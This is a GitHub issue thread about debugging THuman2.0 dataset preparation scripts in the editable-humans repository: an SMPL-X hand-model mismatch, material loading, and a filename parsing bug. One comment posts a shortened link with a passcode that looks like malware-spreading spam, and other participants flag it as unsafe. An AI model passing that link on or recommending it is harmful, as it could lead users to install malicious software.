### ISSUE TITLE
Run align_thuman.py, by report an error

### ISSUE THREAD

**Issue by Moronrift08** [custom-humans/editable-humans#7]
Hi, here is a problem when I'm running align_thuman.py.

return _VF.einsum(equation, operands)  # type: ignore[attr-defined]
RuntimeError: einsum(): operands do not broadcast with remapped shapes [original->remapped]: [1, 45]->[1, 1, 45] [12, 45]->[1, 45, 12]

I'm trying to use THuman2.0 to train the model, when preparing the dataset following the words in README.md:⚠️ Note that the scans in THuman2.0 are in various scales. We rescale them to -1~1 based on the SMPL-X models. You can find the rescaling script [here](https://github.com/custom-humans/editable-humans/blob/main/tools/align_thuman.py)

My environment:
Ubuntu 20.04.6
Python 3.8
Pytorch 1.11.0+cu113

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by JianShu0721** [comment]
> Give this a shot https://bit.ly/4eaAnWN Passcode: changeme you must have a gcc compiler

DO NOT CLICK THIS LINK！！！
It's not safe.

**Comment by azuxmioy** [comment]
Hi, thanks for your question and for reporting the spam🙂

We also have a newer version [here](https://github.com/SiTH-Diffusion/SiTH/blob/main/tools/align_thuman.py) in our SiTH repo.

But your issue seems to be using the wrong model to load the SMPL-X params.

Are you trying to process THuman2.1? Actually, 2.0 and 2.1 used different models

2.0 used the male model with PCA of hand with 12 components 
2.1 used the neutral model without PCA (45 joints).

You need to correct these arguments at the beginning like [here](https://github.com/SiTH-Diffusion/SiTH/blob/main/tools/align_thuman.py#L20)

Let me know if this solves your problem. Thanks!

**Comment by Moronrift08** [comment]
> Hi, thanks for your question and for reporting the spam🙂
> 
> We also have a newer version [here](https://github.com/SiTH-Diffusion/SiTH/blob/main/tools/align_thuman.py) in our SiTH repo.
> 
> But your issue seems to be using the wrong model to load the SMPL-X params.
> 
> Are you trying to process THuman2.1? Actually, 2.0 and 2.1 used different models
> 
> 2.0 used the male model with PCA of hand with 12 components 2.1 used the neutral model without PCA (45 joints).
> 
> You need to correct these arguments at the beginning like [here](https://github.com/SiTH-Diffusion/SiTH/blob/main/tools/align_thuman.py#L20)
> 
> Let me know if this solves your problem. Thanks!

Hi, many thanks for your help and it works!

However, when I'm trying to use generate_dataset.py to make THuman.h5 file for training, it seems that this scripts cannot detect the materials.  The problem is:

Traceback (most recent call last):
  File "/home/3Dhuman/LLEVH/editable-humans/generate_dataset.py", line 250, in <module>
    main(parser.parse_args())
  File "/home/3Dhuman/LLEVH/editable-humans/generate_dataset.py", line 132, in main
    rgb1, nrm1, d1 = closest_tex(V.cuda(), F.cuda(), 
  File "/home/3Dhuman/LLEVH/editable-humans/lib/ops/mesh/closest_tex.py", line 59, in closest_tex
    rgb = sample_tex(hit_Tp, hit_TM, materials)
  File "/home/3Dhuman/LLEVH/editable-humans/lib/ops/mesh/sample_tex.py", line 28, in sample_tex
    assert(max_idx > -1 and "No materials detected! Check the material definiton on your mesh.")
AssertionError


I use the aligned THuman data as input, the picture shows the structure of the dataset.
![examp](https://github.com/user-attachments/assets/c1138323-9b37-4145-9e53-86060c248218)
Do you have any ideas? I'd appreciate it.

**Comment by azuxmioy** [comment]
Hello,

This might be a problem from the **trimesh** library since an update of its file IO. 

I think I have already fixed this issue in the new version `align_thuman.py` in the [SiTH repo](https://github.com/SiTH-Diffusion/SiTH/blob/main/tools/align_thuman.py).

A fast way to check this is to open your 0000.obj with Meshlab and see if it loads the material automatically. 

If not, you can open the obj file as a txt file. The definition of the material file is located in the very beginning.

**Comment by Moronrift08** [comment]
> Hello,
> 
> This might be a problem from the **trimesh** library since an update of its file IO.
> 
> I think I have already fixed this issue in the new version `align_thuman.py` in the [SiTH repo](https://github.com/SiTH-Diffusion/SiTH/blob/main/tools/align_thuman.py).
> 
> A fast way to check this is to open your 0000.obj with Meshlab and see if it loads the material automatically.
> 
> If not, you can open the obj file as a txt file. The definition of the material file is located in the very beginning.

Hi, meshlab could load the material automatically. When I open the .obj file as tet, it looks like this:

![image](https://github.com/user-attachments/assets/b5274567-bdb4-42a8-8ced-69b16bebf7f0)
The left is from the aligned THuman dataset while the right one is from Costomhuman dataset
Also I think the .mti file is also correctly related too the material:
![image](https://github.com/user-attachments/assets/5dcf6cc3-8764-498f-8853-0bf3199f12e4)

Is this a problem on the dataset? I use the new version align_Thuman to process data.

**Comment by Moronrift08** [comment]
Finished, it seems that in the file generate_dataset.py, there is a strange logic error.
When trying to loading xxxx.obj file in the THuman dataset, the filename is still xxxx_smplx.obj.
However this not happen on CustomHuman dataset.

**Comment by azuxmioy** [comment]
Thanks for the clarification😀.

Yes, it seems that the filename parsing in this [line](https://github.com/custom-humans/editable-humans/blob/main/generate_dataset.py#L113) doesn't match the THuman file format.

Originally this repo was intended for the CustomHuman dataset, and I didn't notice this mistake when using THuman😅
